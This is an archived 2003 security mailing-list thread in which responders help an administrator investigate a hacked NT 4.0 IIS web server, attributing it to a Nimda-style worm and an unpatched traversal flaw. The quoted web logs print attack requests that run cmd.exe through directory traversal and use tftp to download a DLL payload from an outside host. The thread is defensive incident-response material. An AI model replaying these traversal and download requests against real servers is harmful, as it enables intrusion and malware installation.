Re: Hacked web server

["sunzi" <sunzi () mod-x co uk>]

Rogelio,

on Nimda.E from Symantec:
This worm is similar in functionality to W32.Nimda.A@mm. Differences include
the modification of file names used by the worm.
    The attachment received has been changed to: Sample.exe
    The dropped .dll file is now: Httpodbc.dll
    The worm now copies itself to the \%Windows% folder as Csrss.exe instead
of Mmc.exe

Try looking for c:\winnt\csrss.exe for the virus.

Also, this isn't where the ncx99.exe came from. I'd do a thorough search for
any usage of cmd.exe/root.exe in your web logs and start there, after taking
it offline.

hth,
sunzi
----- Original Message -----
From: "Michael Katz" <mike () procinct com>
To: <incidents () securityfocus com>
Cc: "Rogelio Vidaurri Courcelle" <rvidaurri () haciendachiapas gob mx>
Sent: Sunday, January 12, 2003 9:20 PM
Subject: Re: Hacked web server


> At 1/10/2003 12:39 PM, Rogelio Vidaurri Courcelle wrote:
>
> > Hi... my web server (NT 4.0 SP6a) was hacked last friday
>
> Rogelio,
>
> > 200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221,
> > 125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
> > /c+dir,
>
> The above shows that your server is susceptible to a vulnerability
detailed
> in Microsoft Security Bulletin MS00-057
> (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp).  This
> vulnerability is NOT fixed by Service Pack 6a.  You need to install
> additional patches for IIS.  When you rebuild the server, you should
> install the cumulative IIS patch described in Microsoft Security Bulletin
> MS02-062 (http://www.microsoft.com/technet/security/bulletin/ms02-062.asp)
>
> > 200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221,
> > 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
> > /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\httpodbc.dll,
> > 200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221,
> > 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
> > /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20d:\httpodbc.dll,
> > 200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221,
> > 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
> > /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20e:\httpodbc.dll,
>
> Your failure to find a virus (httpodbc.dll) on your hard disk may indicate
> that your firewall was configured properly or that antivirus software
> prevented the infected file from being written to your hard disk (if you
> had antivirus software with relatively current definitions).  However,
> there are plenty of other bad things that could be on your system that
> attackers could have placed on your system that would not be flagged as
> malware by antivirus software.
>
> > i have read that it could be because of Nimda but i have scanned with
> > the latest pattern and it found no viruses... only a backdoor trojan
> > called ncx99.exe dropped in mailroot\drop\temp
> > by the way, can i delete files inside that folder??? there's a
> > rundlls32.exe... a KEY file, etcetera......
>
> ncx99.exe is most likely a modified version of netcat and is not flagged
by
> most antivirus software as malware.
>
> If your machine has been configured this way for two months, you should
> rebuild it and start from scratch.  Who knows what attackers may have done
> to your system?
>
>
> Michael Katz
> mike () procinct com
> Procinct Security
>
>
> --------------------------------------------------------------------------
--
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com